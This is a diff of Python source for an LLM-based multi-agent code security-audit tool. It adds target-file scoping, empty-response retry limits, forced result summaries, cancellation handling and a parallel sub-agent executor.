||||
data={
|
||||
"findings": all_findings,
|
||||
"steps": [
|
||||
{
|
||||
"thought": s.thought,
|
||||
"action": s.action,
|
||||
"action_input": s.action_input,
|
||||
"observation": s.observation[:500] if s.observation else None,
|
||||
}
|
||||
for s in self._steps
|
||||
],
|
||||
},
|
||||
iterations=self._iteration,
|
||||
tool_calls=self._tool_calls,
|
||||
tokens_used=self._total_tokens,
|
||||
duration_ms=duration_ms,
|
||||
)
|
||||
|
||||
except Exception as e:
|
||||
logger.error(f"ReAct Agent failed: {e}", exc_info=True)
|
||||
return AgentResult(success=False, error=str(e))
|
||||
|
||||
def get_conversation_history(self) -> List[Dict[str, str]]:
|
||||
"""获取对话历史"""
|
||||
return self._conversation_history
|
||||
|
||||
def get_steps(self) -> List[AgentStep]:
|
||||
"""获取执行步骤"""
|
||||
return self._steps
|
||||
|
|
@ -99,6 +99,12 @@ Final Answer: [JSON 格式的收集结果]
|
|||
4. 运行安全扫描发现初步问题
|
||||
5. 根据发现继续深入
|
||||
|
||||
## 重要提示
|
||||
- 用户可能指定了特定的目标文件进行审计
|
||||
- 如果 list_files 显示"审计范围限定为 X 个指定文件",说明只需要分析这些文件
|
||||
- 在这种情况下,直接读取和分析指定的文件,不要浪费时间遍历其他目录
|
||||
- 如果目录显示为空,可能是因为该目录不包含目标文件
|
||||
|
||||
## 重要原则
|
||||
1. **你是大脑** - 每一步都要思考,不要机械执行
|
||||
2. **动态调整** - 根据发现调整策略
|
||||
|
|
@ -216,13 +222,38 @@ class ReconAgent(BaseAgent):
|
|||
task = input_data.get("task", "")
|
||||
task_context = input_data.get("task_context", "")
|
||||
|
||||
# 🔥 获取目标文件列表
|
||||
target_files = config.get("target_files", [])
|
||||
exclude_patterns = config.get("exclude_patterns", [])
|
||||
|
||||
# 构建初始消息
|
||||
initial_message = f"""请开始收集项目信息。
|
||||
|
||||
## 项目基本信息
|
||||
- 名称: {project_info.get('name', 'unknown')}
|
||||
- 根目录: {project_info.get('root', '.')}
|
||||
- 文件数量: {project_info.get('file_count', 'unknown')}
|
||||
|
||||
## 审计范围
|
||||
"""
|
||||
# 🔥 如果指定了目标文件,明确告知 Agent
|
||||
if target_files:
|
||||
initial_message += f"""⚠️ **重要**: 用户指定了 {len(target_files)} 个目标文件进行审计:
|
||||
"""
|
||||
for tf in target_files[:10]:
|
||||
initial_message += f"- {tf}\n"
|
||||
if len(target_files) > 10:
|
||||
initial_message += f"- ... 还有 {len(target_files) - 10} 个文件\n"
|
||||
initial_message += """
|
||||
请直接读取和分析这些指定的文件,不要浪费时间遍历其他目录。
|
||||
"""
|
||||
else:
|
||||
initial_message += "全项目审计(无特定文件限制)\n"
|
||||
|
||||
if exclude_patterns:
|
||||
initial_message += f"\n排除模式: {', '.join(exclude_patterns[:5])}\n"
|
||||
|
||||
initial_message += f"""
|
||||
## 任务上下文
|
||||
{task_context or task or '进行全面的信息收集,为安全审计做准备。'}
|
||||
|
||||
|
|
@ -239,6 +270,7 @@ class ReconAgent(BaseAgent):
|
|||
|
||||
self._steps = []
|
||||
final_result = None
|
||||
error_message = None # 🔥 跟踪错误信息
|
||||
|
||||
await self.emit_thinking("Recon Agent 启动,LLM 开始自主收集信息...")
|
||||
|
||||
|
|
@ -259,7 +291,7 @@ class ReconAgent(BaseAgent):
|
|||
llm_output, tokens_this_round = await self.stream_llm_call(
|
||||
self._conversation_history,
|
||||
temperature=0.1,
|
||||
max_tokens=2048,
|
||||
max_tokens=4096, # 🔥 增加到 4096,避免截断
|
||||
)
|
||||
except asyncio.CancelledError:
|
||||
logger.info(f"[{self.name}] LLM call cancelled")
|
||||
|
|
@ -270,13 +302,22 @@ class ReconAgent(BaseAgent):
|
|||
# 🔥 Handle empty LLM response to prevent loops
|
||||
if not llm_output or not llm_output.strip():
|
||||
logger.warning(f"[{self.name}] Empty LLM response in iteration {self._iteration}")
|
||||
await self.emit_llm_decision("收到空响应", "LLM 返回内容为空,尝试重试通过提示")
|
||||
empty_retry_count = getattr(self, '_empty_retry_count', 0) + 1
|
||||
self._empty_retry_count = empty_retry_count
|
||||
if empty_retry_count >= 3:
|
||||
logger.error(f"[{self.name}] Too many empty responses, stopping")
|
||||
error_message = "连续收到空响应,停止信息收集"
|
||||
await self.emit_event("error", error_message)
|
||||
break
|
||||
self._conversation_history.append({
|
||||
"role": "user",
|
||||
"content": "Received empty response. Please output your Thought and Action.",
|
||||
})
|
||||
continue
|
||||
|
||||
# 重置空响应计数器
|
||||
self._empty_retry_count = 0
|
||||
|
||||
# 解析 LLM 响应
|
||||
step = self._parse_llm_response(llm_output)
|
||||
self._steps.append(step)
|
||||
|
|
@ -311,6 +352,11 @@ class ReconAgent(BaseAgent):
|
|||
step.action_input or {}
|
||||
)
|
||||
|
||||
# 🔥 工具执行后检查取消状态
|
||||
if self.is_cancelled:
|
||||
logger.info(f"[{self.name}] Cancelled after tool execution")
|
||||
break
|
||||
|
||||
step.observation = observation
|
||||
|
||||
# 🔥 发射 LLM 观察事件
|
||||
|
|
@ -329,9 +375,84 @@ class ReconAgent(BaseAgent):
|
|||
"content": "请继续,选择一个工具执行,或者如果信息收集完成,输出 Final Answer。",
|
||||
})
|
||||
|
||||
# 🔥 如果循环结束但没有 final_result,强制 LLM 总结
|
||||
if not final_result and not self.is_cancelled and not error_message:
|
||||
await self.emit_thinking("📝 信息收集阶段结束,正在生成总结...")
|
||||
|
||||
# 添加强制总结的提示
|
||||
self._conversation_history.append({
|
||||
"role": "user",
|
||||
"content": """信息收集阶段已结束。请立即输出 Final Answer,总结你收集到的所有信息。
|
||||
|
||||
请按以下 JSON 格式输出:
|
||||
```json
|
||||
{
|
||||
"project_structure": {"directories": [...], "key_files": [...]},
|
||||
"tech_stack": {"languages": [...], "frameworks": [...], "databases": [...]},
|
||||
"entry_points": [{"type": "...", "file": "...", "description": "..."}],
|
||||
"high_risk_areas": ["file1.py", "file2.js"],
|
||||
"initial_findings": [{"title": "...", "description": "...", "file_path": "..."}],
|
||||
"summary": "项目总结描述"
|
||||
}
|
||||
```
|
||||
|
||||
Final Answer:""",
|
||||
})
|
||||
|
||||
try:
|
||||
summary_output, _ = await self.stream_llm_call(
|
||||
self._conversation_history,
|
||||
temperature=0.1,
|
||||
max_tokens=2048,
|
||||
)
|
||||
|
||||
if summary_output and summary_output.strip():
|
||||
# 解析总结输出
|
||||
summary_text = summary_output.strip()
|
||||
summary_text = re.sub(r'```json\s*', '', summary_text)
|
||||
summary_text = re.sub(r'```\s*', '', summary_text)
|
||||
final_result = AgentJsonParser.parse(
|
||||
summary_text,
|
||||
default=self._summarize_from_steps()
|
||||
)
|
||||
except Exception as e:
|
||||
logger.warning(f"[{self.name}] Failed to generate summary: {e}")
|
||||
|
||||
# 处理结果
|
||||
duration_ms = int((time.time() - start_time) * 1000)
|
||||
|
||||
# 🔥 如果被取消,返回取消结果
|
||||
if self.is_cancelled:
|
||||
await self.emit_event(
|
||||
"info",
|
||||
f"🛑 Recon Agent 已取消: {self._iteration} 轮迭代"
|
||||
)
|
||||
return AgentResult(
|
||||
success=False,
|
||||
error="任务已取消",
|
||||
data=self._summarize_from_steps(),
|
||||
iterations=self._iteration,
|
||||
tool_calls=self._tool_calls,
|
||||
tokens_used=self._total_tokens,
|
||||
duration_ms=duration_ms,
|
||||
)
|
||||
|
||||
# 🔥 如果有错误,返回失败结果
|
||||
if error_message:
|
||||
await self.emit_event(
|
||||
"error",
|
||||
f"❌ Recon Agent 失败: {error_message}"
|
||||
)
|
||||
return AgentResult(
|
||||
success=False,
|
||||
error=error_message,
|
||||
data=self._summarize_from_steps(),
|
||||
iterations=self._iteration,
|
||||
tool_calls=self._tool_calls,
|
||||
tokens_used=self._total_tokens,
|
||||
duration_ms=duration_ms,
|
||||
)
|
||||
|
||||
# 如果没有最终结果,从历史中汇总
|
||||
if not final_result:
|
||||
final_result = self._summarize_from_steps()
|
||||
|
|
@ -364,7 +485,7 @@ class ReconAgent(BaseAgent):
|
|||
return AgentResult(success=False, error=str(e))
|
||||
|
||||
def _summarize_from_steps(self) -> Dict[str, Any]:
|
||||
"""从步骤中汇总结果"""
|
||||
"""从步骤中汇总结果 - 增强版,从 LLM 思考过程中提取更多信息"""
|
||||
# 默认结果结构
|
||||
result = {
|
||||
"project_structure": {},
|
||||
|
|
@ -377,34 +498,90 @@ class ReconAgent(BaseAgent):
|
|||
"high_risk_areas": [],
|
||||
"dependencies": {},
|
||||
"initial_findings": [],
|
||||
"summary": "", # 🔥 新增:汇总 LLM 的思考
|
||||
}
|
||||
|
||||
# 从步骤的观察结果中提取信息
|
||||
# 🔥 收集所有 LLM 的思考内容
|
||||
thoughts = []
|
||||
|
||||
# 从步骤的观察结果和思考中提取信息
|
||||
for step in self._steps:
|
||||
# 收集思考内容
|
||||
if step.thought:
|
||||
thoughts.append(step.thought)
|
||||
|
||||
if step.observation:
|
||||
# 尝试从观察中识别技术栈等信息
|
||||
obs_lower = step.observation.lower()
|
||||
|
||||
if "package.json" in obs_lower:
|
||||
# 识别语言
|
||||
if "package.json" in obs_lower or ".js" in obs_lower or ".ts" in obs_lower:
|
||||
result["tech_stack"]["languages"].append("JavaScript/TypeScript")
|
||||
if "requirements.txt" in obs_lower or "setup.py" in obs_lower:
|
||||
if "requirements.txt" in obs_lower or "setup.py" in obs_lower or ".py" in obs_lower:
|
||||
result["tech_stack"]["languages"].append("Python")
|
||||
if "go.mod" in obs_lower:
|
||||
if "go.mod" in obs_lower or ".go" in obs_lower:
|
||||
result["tech_stack"]["languages"].append("Go")
|
||||
if "pom.xml" in obs_lower or ".java" in obs_lower:
|
||||
result["tech_stack"]["languages"].append("Java")
|
||||
if ".php" in obs_lower:
|
||||
result["tech_stack"]["languages"].append("PHP")
|
||||
if ".rb" in obs_lower or "gemfile" in obs_lower:
|
||||
result["tech_stack"]["languages"].append("Ruby")
|
||||
|
||||
# 识别框架
|
||||
if "react" in obs_lower:
|
||||
result["tech_stack"]["frameworks"].append("React")
|
||||
if "vue" in obs_lower:
|
||||
result["tech_stack"]["frameworks"].append("Vue")
|
||||
if "angular" in obs_lower:
|
||||
result["tech_stack"]["frameworks"].append("Angular")
|
||||
if "django" in obs_lower:
|
||||
result["tech_stack"]["frameworks"].append("Django")
|
||||
if "flask" in obs_lower:
|
||||
result["tech_stack"]["frameworks"].append("Flask")
|
||||
if "fastapi" in obs_lower:
|
||||
result["tech_stack"]["frameworks"].append("FastAPI")
|
||||
if "express" in obs_lower:
|
||||
result["tech_stack"]["frameworks"].append("Express")
|
||||
if "spring" in obs_lower:
|
||||
result["tech_stack"]["frameworks"].append("Spring")
|
||||
if "streamlit" in obs_lower:
|
||||
result["tech_stack"]["frameworks"].append("Streamlit")
|
||||
|
||||
# 识别数据库
|
||||
if "mysql" in obs_lower or "pymysql" in obs_lower:
|
||||
result["tech_stack"]["databases"].append("MySQL")
|
||||
if "postgres" in obs_lower or "asyncpg" in obs_lower:
|
||||
result["tech_stack"]["databases"].append("PostgreSQL")
|
||||
if "mongodb" in obs_lower or "pymongo" in obs_lower:
|
||||
result["tech_stack"]["databases"].append("MongoDB")
|
||||
if "redis" in obs_lower:
|
||||
result["tech_stack"]["databases"].append("Redis")
|
||||
if "sqlite" in obs_lower:
|
||||
result["tech_stack"]["databases"].append("SQLite")
|
||||
|
||||
# 🔥 识别高风险区域(从观察中提取)
|
||||
risk_keywords = ["api", "auth", "login", "password", "secret", "key", "token",
|
||||
"admin", "upload", "download", "exec", "eval", "sql", "query"]
|
||||
for keyword in risk_keywords:
|
||||
if keyword in obs_lower:
|
||||
# 尝试从观察中提取文件路径
|
||||
import re
|
||||
file_matches = re.findall(r'[\w/]+\.(?:py|js|ts|java|php|go|rb)', step.observation)
|
||||
for file_path in file_matches[:3]: # 限制数量
|
||||
if file_path not in result["high_risk_areas"]:
|
||||
result["high_risk_areas"].append(file_path)
|
||||
|
||||
# 去重
|
||||
result["tech_stack"]["languages"] = list(set(result["tech_stack"]["languages"]))
|
||||
result["tech_stack"]["frameworks"] = list(set(result["tech_stack"]["frameworks"]))
|
||||
result["tech_stack"]["databases"] = list(set(result["tech_stack"]["databases"]))
|
||||
result["high_risk_areas"] = list(set(result["high_risk_areas"]))[:20] # 限制数量
|
||||
|
||||
# 🔥 汇总 LLM 的思考作为 summary
|
||||
if thoughts:
|
||||
# 取最后几个思考作为总结
|
||||
result["summary"] = "\n".join(thoughts[-3:])
|
||||
|
||||
return result
|
||||
|
||||
|
|
|
|||
|
|
@ -334,7 +334,7 @@ class VerificationAgent(BaseAgent):
|
|||
llm_output, tokens_this_round = await self.stream_llm_call(
|
||||
self._conversation_history,
|
||||
temperature=0.1,
|
||||
max_tokens=3000,
|
||||
max_tokens=4096, # 🔥 增加到 4096,避免截断
|
||||
)
|
||||
except asyncio.CancelledError:
|
||||
logger.info(f"[{self.name}] LLM call cancelled")
|
||||
|
|
@ -415,6 +415,22 @@ class VerificationAgent(BaseAgent):
|
|||
# 处理结果
|
||||
duration_ms = int((time.time() - start_time) * 1000)
|
||||
|
||||
# 🔥 如果被取消,返回取消结果
|
||||
if self.is_cancelled:
|
||||
await self.emit_event(
|
||||
"info",
|
||||
f"🛑 Verification Agent 已取消: {self._iteration} 轮迭代"
|
||||
)
|
||||
return AgentResult(
|
||||
success=False,
|
||||
error="任务已取消",
|
||||
data={"findings": findings_to_verify},
|
||||
iterations=self._iteration,
|
||||
tool_calls=self._tool_calls,
|
||||
tokens_used=self._total_tokens,
|
||||
duration_ms=duration_ms,
|
||||
)
|
||||
|
||||
# 处理最终结果
|
||||
verified_findings = []
|
||||
if final_result and "findings" in final_result:
|
||||
|
|
|
|||
|
|
@ -0,0 +1,53 @@
|
|||
"""
|
||||
DeepAudit Agent 核心模块
|
||||
|
||||
包含Agent系统的基础组件:
|
||||
- state: 增强的Agent状态管理
|
||||
- registry: Agent注册表和动态Agent树管理
|
||||
- message: Agent间通信机制
|
||||
- executor: 动态Agent树执行器
|
||||
- persistence: Agent状态持久化
|
||||
"""
|
||||
|
||||
from .state import AgentState, AgentStatus
|
||||
from .registry import AgentRegistry, agent_registry
|
||||
from .message import AgentMessage, MessageType, MessagePriority, MessageBus, message_bus
|
||||
from .executor import (
|
||||
DynamicAgentExecutor,
|
||||
SubAgentExecutor,
|
||||
ExecutionTask,
|
||||
ExecutionResult,
|
||||
ExecutionMode,
|
||||
)
|
||||
from .persistence import (
|
||||
AgentStatePersistence,
|
||||
CheckpointManager,
|
||||
agent_persistence,
|
||||
checkpoint_manager,
|
||||
)
|
||||
|
||||
__all__ = [
|
||||
# State
|
||||
"AgentState",
|
||||
"AgentStatus",
|
||||
# Registry
|
||||
"AgentRegistry",
|
||||
"agent_registry",
|
||||
# Message
|
||||
"AgentMessage",
|
||||
"MessageType",
|
||||
"MessagePriority",
|
||||
"MessageBus",
|
||||
"message_bus",
|
||||
# Executor
|
||||
"DynamicAgentExecutor",
|
||||
"SubAgentExecutor",
|
||||
"ExecutionTask",
|
||||
"ExecutionResult",
|
||||
"ExecutionMode",
|
||||
# Persistence
|
||||
"AgentStatePersistence",
|
||||
"CheckpointManager",
|
||||
"agent_persistence",
|
||||
"checkpoint_manager",
|
||||
]
|
||||
|
|
@ -0,0 +1,491 @@
|
|||
"""
|
||||
动态 Agent 树执行器
|
||||
|
||||
实现完整的动态 Agent 树执行逻辑:
|
||||
- 子 Agent 实际执行
|
||||
- 并行 Agent 执行
|
||||
- 结果汇总
|
||||
- 执行状态追踪
|
||||
"""
|
||||
|
||||
import asyncio
|
||||
import logging
|
||||
import time
|
||||
from typing import Dict, Any, List, Optional, Callable, Awaitable
|
||||
from dataclasses import dataclass, field
|
||||
from enum import Enum
|
||||
from datetime import datetime, timezone
|
||||
|
||||
from .state import AgentState, AgentStatus
|
||||
from .registry import agent_registry
|
||||
from .message import message_bus, MessageType
|
||||
|
||||
logger = logging.getLogger(__name__)
|
||||
|
||||
|
||||
class ExecutionMode(str, Enum):
|
||||
"""执行模式"""
|
||||
SEQUENTIAL = "sequential" # 顺序执行
|
||||
PARALLEL = "parallel" # 并行执行
|
||||
ADAPTIVE = "adaptive" # 自适应(根据任务类型决定)
|
||||
|
||||
|
||||
@dataclass
|
||||
class ExecutionTask:
|
||||
"""执行任务"""
|
||||
agent_id: str
|
||||
agent_type: str
|
||||
task: str
|
||||
context: Dict[str, Any] = field(default_factory=dict)
|
||||
priority: int = 0 # 优先级,数字越大优先级越高
|
||||
dependencies: List[str] = field(default_factory=list) # 依赖的其他任务 ID
|
||||
|
||||
# 执行状态
|
||||
status: str = "pending" # pending, running, completed, failed
|
||||
result: Optional[Dict[str, Any]] = None
|
||||
error: Optional[str] = None
|
||||
started_at: Optional[datetime] = None
|
||||
finished_at: Optional[datetime] = None
|
||||
|
||||
|
||||
@dataclass
|
||||
class ExecutionResult:
|
||||
"""执行结果"""
|
||||
success: bool
|
||||
total_agents: int = 0
|
||||
completed_agents: int = 0
|
||||
failed_agents: int = 0
|
||||
|
||||
# 汇总的发现
|
||||
all_findings: List[Dict[str, Any]] = field(default_factory=list)
|
||||
|
||||
# 各 Agent 的结果
|
||||
agent_results: Dict[str, Dict[str, Any]] = field(default_factory=dict)
|
||||
|
||||
# 执行统计
|
||||
total_duration_ms: int = 0
|
||||
total_tokens: int = 0
|
||||
total_tool_calls: int = 0
|
||||
|
||||
# 错误信息
|
||||
errors: List[str] = field(default_factory=list)
|
||||
|
||||
|
||||
class DynamicAgentExecutor:
|
||||
"""
|
||||
动态 Agent 树执行器
|
||||
|
||||
负责:
|
||||
1. 管理 Agent 的创建和执行
|
||||
2. 处理并行执行和依赖关系
|
||||
3. 汇总执行结果
|
||||
4. 处理错误和超时
|
||||
"""
|
||||
|
||||
def __init__(
|
||||
self,
|
||||
llm_service,
|
||||
tools: Dict[str, Any],
|
||||
event_emitter=None,
|
||||
max_parallel: int = 5,
|
||||
default_timeout: int = 600,
|
||||
):
|
||||
"""
|
||||
初始化执行器
|
||||
|
||||
Args:
|
||||
llm_service: LLM 服务
|
||||
tools: 可用工具
|
||||
event_emitter: 事件发射器
|
||||
max_parallel: 最大并行 Agent 数
|
||||
default_timeout: 默认超时时间(秒)
|
||||
"""
|
||||
self.llm_service = llm_service
|
||||
self.tools = tools
|
||||
self.event_emitter = event_emitter
|
||||
self.max_parallel = max_parallel
|
||||
self.default_timeout = default_timeout
|
||||
|
||||
# 执行状态
|
||||
self._tasks: Dict[str, ExecutionTask] = {}
|
||||
self._running_tasks: Dict[str, asyncio.Task] = {}
|
||||
self._semaphore = asyncio.Semaphore(max_parallel)
|
||||
|
||||
# 取消标志
|
||||
self._cancelled = False
|
||||
|
||||
def cancel(self):
|
||||
"""取消所有执行"""
|
||||
self._cancelled = True
|
||||
|
||||
# 取消所有运行中的任务
|
||||
for task_id, task in self._running_tasks.items():
|
||||
if not task.done():
|
||||
task.cancel()
|
||||
logger.info(f"Cancelled task: {task_id}")
|
||||
|
||||
@property
|
||||
def is_cancelled(self) -> bool:
|
||||
return self._cancelled
|
||||
|
||||
async def execute_agent(
|
||||
self,
|
||||
agent_class,
|
||||
agent_config: Dict[str, Any],
|
||||
input_data: Dict[str, Any],
|
||||
parent_id: Optional[str] = None,
|
||||
knowledge_modules: Optional[List[str]] = None,
|
||||
) -> Dict[str, Any]:
|
||||
"""
|
||||
执行单个 Agent
|
||||
|
||||
Args:
|
||||
agent_class: Agent 类
|
||||
agent_config: Agent 配置
|
||||
input_data: 输入数据
|
||||
parent_id: 父 Agent ID
|
||||
knowledge_modules: 知识模块列表
|
||||
|
||||
Returns:
|
||||
Agent 执行结果
|
||||
"""
|
||||
if self._cancelled:
|
||||
return {"success": False, "error": "Execution cancelled"}
|
||||
|
||||
async with self._semaphore:
|
||||
try:
|
||||
# 创建 Agent 实例
|
||||
agent = agent_class(
|
||||
llm_service=self.llm_service,
|
||||
tools=self.tools,
|
||||
event_emitter=self.event_emitter,
|
||||
parent_id=parent_id,
|
||||
knowledge_modules=knowledge_modules,
|
||||
**agent_config,
|
||||
)
|
||||
|
||||
# 执行 Agent
|
||||
start_time = time.time()
|
||||
result = await asyncio.wait_for(
|
||||
agent.run(input_data),
|
||||
timeout=self.default_timeout,
|
||||
)
|
||||
duration_ms = int((time.time() - start_time) * 1000)
|
||||
|
||||
return {
|
||||
"success": result.success,
|
||||
"data": result.data,
|
||||
"error": result.error,
|
||||
"agent_id": agent.agent_id,
|
||||
"iterations": result.iterations,
|
||||
"tokens_used": result.tokens_used,
|
||||
"tool_calls": result.tool_calls,
|
||||
"duration_ms": duration_ms,
|
||||
"handoff": result.handoff.to_dict() if result.handoff else None,
|
||||
}
|
||||
|
||||
except asyncio.TimeoutError:
|
||||
logger.error(f"Agent execution timed out")
|
||||
return {"success": False, "error": "Execution timed out"}
|
||||
except asyncio.CancelledError:
|
||||
logger.info(f"Agent execution cancelled")
|
||||
return {"success": False, "error": "Execution cancelled"}
|
||||
except Exception as e:
|
||||
logger.error(f"Agent execution failed: {e}", exc_info=True)
|
||||
return {"success": False, "error": str(e)}
|
||||
|
||||
async def execute_parallel(
|
||||
self,
|
||||
tasks: List[ExecutionTask],
|
||||
agent_factory: Callable[[ExecutionTask], Awaitable[Dict[str, Any]]],
|
||||
) -> ExecutionResult:
|
||||
"""
|
||||
并行执行多个 Agent 任务
|
||||
|
||||
Args:
|
||||
tasks: 任务列表
|
||||
agent_factory: Agent 工厂函数,接收任务返回执行结果
|
||||
|
||||
Returns:
|
||||
汇总的执行结果
|
||||
"""
|
||||
if not tasks:
|
||||
return ExecutionResult(success=True)
|
||||
|
||||
start_time = time.time()
|
||||
|
||||
# 按优先级排序
|
||||
sorted_tasks = sorted(tasks, key=lambda t: t.priority, reverse=True)
|
||||
|
||||
# 分离有依赖和无依赖的任务
|
||||
independent_tasks = [t for t in sorted_tasks if not t.dependencies]
|
||||
dependent_tasks = [t for t in sorted_tasks if t.dependencies]
|
||||
|
||||
# 存储任务
|
||||
for task in sorted_tasks:
|
||||
self._tasks[task.agent_id] = task
|
||||
|
||||
result = ExecutionResult(
|
||||
success=True,
|
||||
total_agents=len(tasks),
|
||||
)
|
||||
|
||||
# 先执行无依赖的任务
|
||||
if independent_tasks:
|
||||
await self._execute_task_batch(independent_tasks, agent_factory, result)
|
||||
|
||||
# 然后执行有依赖的任务
|
||||
for task in dependent_tasks:
|
||||
if self._cancelled:
|
||||
break
|
||||
|
||||
# 等待依赖完成
|
||||
await self._wait_for_dependencies(task)
|
||||
|
||||
# 执行任务
|
||||
await self._execute_single_task(task, agent_factory, result)
|
||||
|
||||
# 计算总时长
|
||||
result.total_duration_ms = int((time.time() - start_time) * 1000)
|
||||
|
||||
# 判断整体成功状态
|
||||
result.success = result.failed_agents == 0
|
||||
|
||||
return result
|
||||
|
||||
async def _execute_task_batch(
|
||||
self,
|
||||
tasks: List[ExecutionTask],
|
||||
agent_factory: Callable[[ExecutionTask], Awaitable[Dict[str, Any]]],
|
||||
result: ExecutionResult,
|
||||
):
|
||||
"""执行一批任务"""
|
||||
async_tasks = []
|
||||
|
||||
for task in tasks:
|
||||
if self._cancelled:
|
||||
break
|
||||
|
||||
async_task = asyncio.create_task(
|
||||
self._execute_single_task(task, agent_factory, result)
|
||||
)
|
||||
self._running_tasks[task.agent_id] = async_task
|
||||
async_tasks.append(async_task)
|
||||
|
||||
# 等待所有任务完成
|
||||
if async_tasks:
|
||||
await asyncio.gather(*async_tasks, return_exceptions=True)
|
||||
|
||||
async def _execute_single_task(
|
||||
self,
|
||||
task: ExecutionTask,
|
||||
agent_factory: Callable[[ExecutionTask], Awaitable[Dict[str, Any]]],
|
||||
result: ExecutionResult,
|
||||
):
|
||||
"""执行单个任务"""
|
||||
task.status = "running"
|
||||
task.started_at = datetime.now(timezone.utc)
|
||||
|
||||
try:
|
||||
# 调用工厂函数执行 Agent
|
||||
agent_result = await agent_factory(task)
|
||||
|
||||
task.finished_at = datetime.now(timezone.utc)
|
||||
task.result = agent_result
|
||||
|
||||
if agent_result.get("success"):
|
||||
task.status = "completed"
|
||||
result.completed_agents += 1
|
||||
|
||||
# 收集发现
|
||||
findings = agent_result.get("data", {}).get("findings", [])
|
||||
result.all_findings.extend(findings)
|
||||
|
||||
# 统计
|
||||
result.total_tokens += agent_result.get("tokens_used", 0)
|
||||
result.total_tool_calls += agent_result.get("tool_calls", 0)
|
||||
else:
|
||||
task.status = "failed"
|
||||
task.error = agent_result.get("error")
|
||||
result.failed_agents += 1
|
||||
result.errors.append(f"{task.agent_id}: {task.error}")
|
||||
|
||||
# 保存结果
|
||||
result.agent_results[task.agent_id] = agent_result
|
||||
|
||||
except Exception as e:
|
||||
task.status = "failed"
|
||||
task.error = str(e)
|
||||
task.finished_at = datetime.now(timezone.utc)
|
||||
result.failed_agents += 1
|
||||
result.errors.append(f"{task.agent_id}: {str(e)}")
|
||||
logger.error(f"Task {task.agent_id} failed: {e}", exc_info=True)
|
||||
|
||||
finally:
|
||||
# 清理运行中的任务
|
||||
self._running_tasks.pop(task.agent_id, None)
|
||||
|
||||
async def _wait_for_dependencies(self, task: ExecutionTask):
|
||||
"""等待任务的依赖完成"""
|
||||
for dep_id in task.dependencies:
|
||||
dep_task = self._tasks.get(dep_id)
|
||||
if not dep_task:
|
||||
continue
|
||||
|
||||
# 等待依赖任务完成
|
||||
while dep_task.status in ["pending", "running"]:
|
||||
if self._cancelled:
|
||||
return
|
||||
await asyncio.sleep(0.1)
|
||||
|
||||
def get_execution_summary(self) -> Dict[str, Any]:
|
||||
"""获取执行摘要"""
|
||||
return {
|
||||
"total_tasks": len(self._tasks),
|
||||
"completed": sum(1 for t in self._tasks.values() if t.status == "completed"),
|
||||
"failed": sum(1 for t in self._tasks.values() if t.status == "failed"),
|
||||
"pending": sum(1 for t in self._tasks.values() if t.status == "pending"),
|
||||
"running": sum(1 for t in self._tasks.values() if t.status == "running"),
|
||||
"tasks": {
|
||||
tid: {
|
||||
"status": t.status,
|
||||
"agent_type": t.agent_type,
|
||||
"error": t.error,
|
||||
}
|
||||
for tid, t in self._tasks.items()
|
||||
},
|
||||
}
|
||||
|
||||
|
||||
class SubAgentExecutor:
|
||||
"""
|
||||
子 Agent 执行器
|
||||
|
||||
专门用于从父 Agent 创建和执行子 Agent
|
||||
"""
|
||||
|
||||
def __init__(
|
||||
self,
|
||||
parent_agent,
|
||||
llm_service,
|
||||
tools: Dict[str, Any],
|
||||
event_emitter=None,
|
||||
):
|
||||
self.parent_agent = parent_agent
|
||||
self.llm_service = llm_service
|
||||
self.tools = tools
|
||||
self.event_emitter = event_emitter
|
||||
|
||||
self._child_agents: Dict[str, Any] = {}
|
||||
self._executor = DynamicAgentExecutor(
|
||||
llm_service=llm_service,
|
||||
tools=tools,
|
||||
event_emitter=event_emitter,
|
||||
)
|
||||
|
||||
async def create_and_run_sub_agent(
|
||||
self,
|
||||
agent_type: str,
|
||||
task: str,
|
||||
context: Dict[str, Any] = None,
|
||||
knowledge_modules: List[str] = None,
|
||||
) -> Dict[str, Any]:
|
||||
"""
|
||||
创建并运行子 Agent
|
||||
|
||||
Args:
|
||||
agent_type: Agent 类型 (analysis, verification, specialist)
|
||||
task: 任务描述
|
||||
context: 任务上下文
|
||||
knowledge_modules: 知识模块
|
||||
|
||||
Returns:
|
||||
子 Agent 执行结果
|
||||
"""
|
||||
from ..agents import AnalysisAgent, VerificationAgent
|
||||
|
||||
# 根据类型选择 Agent 类
|
||||
agent_class_map = {
|
||||
"analysis": AnalysisAgent,
|
||||
"verification": VerificationAgent,
|
||||
}
|
||||
|
||||
agent_class = agent_class_map.get(agent_type)
|
||||
if not agent_class:
|
||||
return {"success": False, "error": f"Unknown agent type: {agent_type}"}
|
||||
|
||||
# 准备输入数据
|
||||
input_data = {
|
||||
"task": task,
|
||||
"task_context": context or {},
|
||||
"project_info": context.get("project_info", {}) if context else {},
|
||||
"config": context.get("config", {}) if context else {},
|
||||
}
|
||||
|
||||
# 如果父 Agent 有 handoff,传递给子 Agent
|
||||
if hasattr(self.parent_agent, "_incoming_handoff") and self.parent_agent._incoming_handoff:
|
||||
input_data["parent_handoff"] = self.parent_agent._incoming_handoff.to_dict()
|
||||
|
||||
# 执行子 Agent
|
||||
result = await self._executor.execute_agent(
|
||||
agent_class=agent_class,
|
||||
agent_config={},
|
||||
input_data=input_data,
|
||||
parent_id=self.parent_agent.agent_id,
|
||||
knowledge_modules=knowledge_modules,
|
||||
)
|
||||
|
||||
# 记录子 Agent
|
||||
if result.get("agent_id"):
|
||||
self._child_agents[result["agent_id"]] = result
|
||||
|
||||
return result
|
||||
|
||||
async def run_parallel_sub_agents(
|
||||
self,
|
||||
sub_agent_configs: List[Dict[str, Any]],
|
||||
) -> ExecutionResult:
|
||||
"""
|
||||
并行运行多个子 Agent
|
||||
|
||||
Args:
|
||||
sub_agent_configs: 子 Agent 配置列表
|
||||
[{"agent_type": "analysis", "task": "...", "context": {...}, "knowledge_modules": [...]}]
|
||||
|
||||
Returns:
|
||||
汇总的执行结果
|
||||
"""
|
||||
tasks = []
|
||||
|
||||
for i, config in enumerate(sub_agent_configs):
|
||||
task = ExecutionTask(
|
||||
agent_id=f"sub_{self.parent_agent.agent_id}_{i}",
|
||||
agent_type=config.get("agent_type", "analysis"),
|
||||
task=config.get("task", ""),
|
||||
context=config.get("context", {}),
|
||||
priority=config.get("priority", 0),
|
||||
dependencies=config.get("dependencies", []),
|
||||
)
|
||||
tasks.append(task)
|
||||
|
||||
async def agent_factory(task: ExecutionTask) -> Dict[str, Any]:
|
||||
return await self.create_and_run_sub_agent(
|
||||
agent_type=task.agent_type,
|
||||
task=task.task,
|
||||
context=task.context,
|
||||
knowledge_modules=task.context.get("knowledge_modules"),
|
||||
)
|
||||
|
